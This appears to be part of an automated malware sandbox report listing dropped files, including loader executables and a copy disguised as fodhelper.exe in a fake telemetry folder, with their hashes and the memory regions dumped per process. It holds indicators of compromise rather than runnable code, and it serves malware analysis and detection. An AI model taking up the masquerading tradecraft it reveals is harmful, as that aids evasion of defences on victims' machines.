MD5b7f7b69b4ed7a72230cc42f5e0b47a4f
SHA1929855637a87368e9efeead5aa73d20e357d73c5
SHA256d3fbb9e0ee121f424d3bed2d62e57efd22b9bfcb31b4506966365a93d6f2857c
SHA512e7255640003a72ad8faa2d261eefa16f18750c2d581166b909d29709f00ccdd726c0c4d7589c567be472798d53786dd3a0b2f019aad1722a7acaad7e1547c3cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD528b255a2fd5768ccd5b599e567fc2bb8
SHA1611f5d9d4af8aa3dac7305a0613e3c3f93807a7b
SHA256fec95b571491e3964058a86f6bcb242ab8313a88458cc17f3e1e58b6cfeabe23
SHA5121dd7011350d259e5d5dd6dc07332e9db0f7266efb2a00a5362105209dffc9d279164780b2db23a3c5e33b11eafd2183018a3170d24e0d5b56abf8ad8db3d75ae
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD58de645c759808698d80b0d3f2b72cdef
SHA18c1d16d8dd6cd88810e405aeda9d7a117ba972ab
SHA2563dedd335a7e49f4c31af5a96ed016bd0d48923a7edcc67db1b097c93c501856a
SHA512c47b1d9628aa3d49bb2b9a56d0a2eae4aabe52121678506683794de843d57ab049e0949faf3a6e7b008231c7eefa7fbf8cf54584aea120b0116c3d7dcfadefb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD58de645c759808698d80b0d3f2b72cdef
SHA18c1d16d8dd6cd88810e405aeda9d7a117ba972ab
SHA2563dedd335a7e49f4c31af5a96ed016bd0d48923a7edcc67db1b097c93c501856a
SHA512c47b1d9628aa3d49bb2b9a56d0a2eae4aabe52121678506683794de843d57ab049e0949faf3a6e7b008231c7eefa7fbf8cf54584aea120b0116c3d7dcfadefb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.datFilesize
14.0MB
MD55fb5d00eeb08292c47add44177f736af
SHA1f9d92d9057988e720001015df24e3d1ad76ac972
SHA25644e34068b6af9e42f9155c8c86df56ee5aef2e750d00318adb07b02d6f16e07b
SHA512373be8c90187944e993ebc2c91580b605a876f9b3a5ed3125305a51de357893f10e8db1c037a419ac26be029ab4e95ee342a3b76d10a9cfc1c74f93cb7d34b98
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfmFilesize
16KB
MD542b2ed2f65c984d5b24e07c56538d7b9
SHA165ca741635d760693a1648efeb8519c33c8eaa20
SHA2562dca6983464acd87335d88d1f316a65a687c8281b98e7b2d6859e06abd8c641a
SHA5125b3a4ccb07a68bde1e1fd237fa05c01d9d41201d1abfd78cc717dcf6e3356be2da96c4124adc386526a31e862755f79e96811c65362c8ede5fe239aaa1ea0e95
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaLFilesize
2KB
MD5b2446d155f77cf70a33bb0c25172fa3f
SHA1c20d68dad9e872b4607a5677c4851f863c28daf7
SHA2560faba9ea9b88b2982372c66b2eea8d6a5d99fc565c37db53ba6a4075619cfffb
SHA5125d38e78c38f64a989570b431f7d2ef660c0678b3dc25baf3244499308535492de861a244e262720e36eeb4f8127eca62679c0b0383350c302783246191e82654
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pria4hqk.zem.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPjFilesize
71KB
MD553bf804f75123ed2339305be1d298398
SHA133a337e3e219da8ecd237b44fbcaf4864124a012
SHA2567d6155b8b6c9a78a70af6be7df47f1dac5f40215f4a6ae431d1ee27c021888f8
SHA5127611c75031b77b6098f1e70c1b27e0a95f259616f8b2f8acc734e371998badf321c10c9fb8669d61615673f0fb65787f0398966bda38cd430e009c83df00e16e
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
memory/212-171-0x0000000008240000-0x00000000088BA000-memory.dmpFilesize
6.5MB
-
memory/212-156-0x00000000068E0000-0x00000000068FE000-memory.dmpFilesize
120KB
-
memory/212-173-0x0000000007C70000-0x0000000007C7A000-memory.dmpFilesize
40KB
-
memory/212-174-0x0000000007EC0000-0x0000000007F56000-memory.dmpFilesize
600KB
-
memory/212-197-0x0000000005530000-0x0000000005540000-memory.dmpFilesize
64KB
-
memory/212-200-0x0000000005530000-0x0000000005540000-memory.dmpFilesize
64KB
-
memory/212-175-0x0000000007E30000-0x0000000007E3E000-memory.dmpFilesize
56KB
-
memory/212-176-0x0000000007E80000-0x0000000007E9A000-memory.dmpFilesize
104KB
-
memory/212-179-0x0000000008E70000-0x0000000009414000-memory.dmpFilesize
5.6MB
-
memory/212-170-0x000000007EF50000-0x000000007EF60000-memory.dmpFilesize
64KB
-
memory/212-169-0x0000000006E80000-0x0000000006E9E000-memory.dmpFilesize
120KB
-
memory/212-159-0x00000000742C0000-0x000000007430C000-memory.dmpFilesize
304KB
-
memory/212-177-0x0000000007E70000-0x0000000007E78000-memory.dmpFilesize
32KB
-
memory/212-158-0x0000000006EA0000-0x0000000006ED2000-memory.dmpFilesize
200KB
-
memory/212-157-0x0000000005530000-0x0000000005540000-memory.dmpFilesize
64KB
-
memory/212-172-0x0000000007C00000-0x0000000007C1A000-memory.dmpFilesize
104KB
-
memory/212-178-0x0000000007F90000-0x0000000007FB2000-memory.dmpFilesize
136KB
-
memory/212-146-0x0000000006280000-0x00000000062E6000-memory.dmpFilesize
408KB
-
memory/212-145-0x0000000006210000-0x0000000006276000-memory.dmpFilesize
408KB
-
memory/212-144-0x0000000005A10000-0x0000000005A32000-memory.dmpFilesize
136KB
-
memory/212-143-0x0000000005530000-0x0000000005540000-memory.dmpFilesize
64KB
-
memory/212-142-0x0000000005530000-0x0000000005540000-memory.dmpFilesize
64KB
-
memory/212-141-0x0000000005B70000-0x0000000006198000-memory.dmpFilesize
6.2MB
-
memory/212-140-0x00000000032F0000-0x0000000003326000-memory.dmpFilesize
216KB
-
memory/444-376-0x000001C302490000-0x000001C3024B7000-memory.dmpFilesize
156KB
-
memory/444-375-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/444-373-0x000001C302490000-0x000001C3024B7000-memory.dmpFilesize
156KB
-
memory/604-426-0x00000214C5C90000-0x00000214C5CB7000-memory.dmpFilesize
156KB
-
memory/604-386-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/604-384-0x00000214C5C90000-0x00000214C5CB7000-memory.dmpFilesize
156KB
-
memory/608-359-0x000002A87DAA0000-0x000002A87DAC7000-memory.dmpFilesize
156KB
-
memory/608-357-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/608-354-0x000002A87DAA0000-0x000002A87DAC7000-memory.dmpFilesize
156KB
-
memory/608-352-0x000002A87DA70000-0x000002A87DA91000-memory.dmpFilesize
132KB
-
memory/660-367-0x000001F1CCB70000-0x000001F1CCB97000-memory.dmpFilesize
156KB
-
memory/660-356-0x000001F1CCB70000-0x000001F1CCB97000-memory.dmpFilesize
156KB
-
memory/660-360-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/672-422-0x0000023FC5860000-0x0000023FC5887000-memory.dmpFilesize
156KB
-
memory/672-379-0x0000023FC5860000-0x0000023FC5887000-memory.dmpFilesize
156KB
-
memory/672-380-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/828-389-0x0000023E2E890000-0x0000023E2E8B7000-memory.dmpFilesize
156KB
-
memory/828-391-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/828-430-0x0000023E2E890000-0x0000023E2E8B7000-memory.dmpFilesize
156KB
-
memory/940-364-0x00000128A2FD0000-0x00000128A2FF7000-memory.dmpFilesize
156KB
-
memory/940-370-0x00000128A2FD0000-0x00000128A2FF7000-memory.dmpFilesize
156KB
-
memory/940-368-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/1012-365-0x0000029C710F0000-0x0000029C71117000-memory.dmpFilesize
156KB
-
memory/1012-369-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/1012-374-0x0000029C710F0000-0x0000029C71117000-memory.dmpFilesize
156KB
-
memory/1084-306-0x0000019EAAE10000-0x0000019EAAE20000-memory.dmpFilesize
64KB
-
memory/1084-298-0x0000019EAAE10000-0x0000019EAAE20000-memory.dmpFilesize
64KB
-
memory/1084-297-0x0000019EAAE10000-0x0000019EAAE20000-memory.dmpFilesize
64KB
-
memory/1136-434-0x0000013A7FED0000-0x0000013A7FEF7000-memory.dmpFilesize
156KB
-
memory/1136-392-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/1136-390-0x0000013A7FED0000-0x0000013A7FEF7000-memory.dmpFilesize
156KB
-
memory/1164-438-0x0000025DE1230000-0x0000025DE1257000-memory.dmpFilesize
156KB
-
memory/1164-396-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/1164-394-0x0000025DE1230000-0x0000025DE1257000-memory.dmpFilesize
156KB
-
memory/1176-401-0x00007FFB71850000-0x00007FFB71860000-memory.dmpFilesize
64KB
-
memory/1176-400-0x00000212046B0000-0x00000212046D7000-memory.dmpFilesize
156KB
-
memory/1176-445-0x00000212046B0000-0x00000212046D7000-memory.dmpFilesize
156KB
-
memory/1320-451-0x0000029ED53C0000-0x0000029ED53E7000-memory.dmpFilesize
156KB
-
memory/1344-455-0x0000022254DA0000-0x0000022254DC7000-memory.dmpFilesize
156KB
-
memory/1376-459-0x00000216345D0000-0x00000216345F7000-memory.dmpFilesize
156KB
-
memory/1384-464-0x000001E65C1B0000-0x000001E65C1D7000-memory.dmpFilesize
156KB
-
memory/1400-469-0x0000015C63DD0000-0x0000015C63DF7000-memory.dmpFilesize
156KB
-
memory/1540-474-0x000001C8F9910000-0x000001C8F9937000-memory.dmpFilesize
156KB
-
memory/1724-477-0x0000020DE5D20000-0x0000020DE5D47000-memory.dmpFilesize
156KB
-
memory/1824-480-0x0000017D5D370000-0x0000017D5D397000-memory.dmpFilesize
156KB
-
memory/1940-483-0x0000021678570000-0x0000021678597000-memory.dmpFilesize
156KB
-
memory/2068-260-0x0000029098AB0000-0x0000029098AD2000-memory.dmpFilesize
136KB
-
memory/2068-266-0x0000029098890000-0x00000290988A0000-memory.dmpFilesize
64KB
-
memory/2068-267-0x0000029098890000-0x00000290988A0000-memory.dmpFilesize
64KB
-
memory/2068-268-0x0000029098890000-0x00000290988A0000-memory.dmpFilesize
64KB
-
memory/2072-311-0x00007FF6329D0000-0x00007FF632D90000-memory.dmpFilesize
3.8MB
-
memory/2072-238-0x00007FF6329D0000-0x00007FF632D90000-memory.dmpFilesize
3.8MB
-
memory/2336-133-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/2336-139-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/3864-312-0x00007FF6BF4F0000-0x00007FF6BF519000-memory.dmpFilesize
164KB
-
memory/4448-315-0x0000000003D50000-0x0000000003D60000-memory.dmpFilesize
64KB
-
memory/4448-363-0x0000000003D50000-0x0000000003D60000-memory.dmpFilesize
64KB
-
memory/4448-314-0x0000000003D50000-0x0000000003D60000-memory.dmpFilesize
64KB
-
memory/4524-247-0x0000000004C00000-0x0000000004C10000-memory.dmpFilesize
64KB
-
memory/4524-196-0x0000000000140000-0x00000000002AC000-memory.dmpFilesize
1.4MB
-
memory/4524-208-0x0000000004AF0000-0x0000000004B82000-memory.dmpFilesize
584KB
-
memory/4524-219-0x0000000004C00000-0x0000000004C10000-memory.dmpFilesize
64KB
-
memory/4524-218-0x0000000005070000-0x000000000507A000-memory.dmpFilesize
40KB
-
memory/4524-223-0x0000000004C00000-0x0000000004C10000-memory.dmpFilesize
64KB
-
memory/4524-239-0x0000000004C00000-0x0000000004C10000-memory.dmpFilesize
64KB
-
memory/4716-345-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/4716-346-0x00007FFBB17D0000-0x00007FFBB19C5000-memory.dmpFilesize
2.0MB
-
memory/4716-342-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/4716-347-0x00007FFBB00E0000-0x00007FFBB019E000-memory.dmpFilesize
760KB
-
memory/4716-349-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/5072-341-0x00007FFBB00E0000-0x00007FFBB019E000-memory.dmpFilesize
760KB
-
memory/5072-340-0x00007FFBB17D0000-0x00007FFBB19C5000-memory.dmpFilesize
2.0MB
-
memory/5072-338-0x00000251F41E0000-0x00000251F41F0000-memory.dmpFilesize
64KB
-
memory/5072-331-0x00000251F41E0000-0x00000251F41F0000-memory.dmpFilesize
64KB
-
memory/5072-330-0x00000251F41E0000-0x00000251F41F0000-memory.dmpFilesize
64KB